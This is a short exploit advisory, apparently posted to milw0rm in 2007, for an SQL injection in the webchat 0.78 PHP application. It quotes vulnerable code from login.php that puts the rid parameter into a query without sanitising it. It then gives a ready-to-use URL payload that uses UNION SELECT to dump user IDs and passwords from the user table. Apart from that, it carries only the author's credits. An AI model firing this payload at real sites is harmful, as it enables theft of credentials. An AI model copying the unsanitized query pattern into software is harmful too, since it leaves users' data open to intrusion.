######################################################################### # # [webchat 0.78] # # Class: SQL Injection # Published 28/06/2007 # Remote: Yes # Critical Level : Dangerous # Site: http://sourceforge.net/projects/webdev-webchat/ # Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0 # Author: R00T[ATI] # Contact: r00t.ati@gmail.com - http://inclusionhunter.altervista.org/index.php # ######################################################################### Vulnerable code: login.php ====================================================== query("select * from room where rid='$rid'"); if ($q->next_record()) { ?> ======================================================= Exploit : ============================================================================================================ http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/* ============================================================================================================ Thanks To: ====================================================== All Root@Shell members; White_Sheep; SparrowRulez; st0ke; ====================================================== # milw0rm.com [2007-06-28]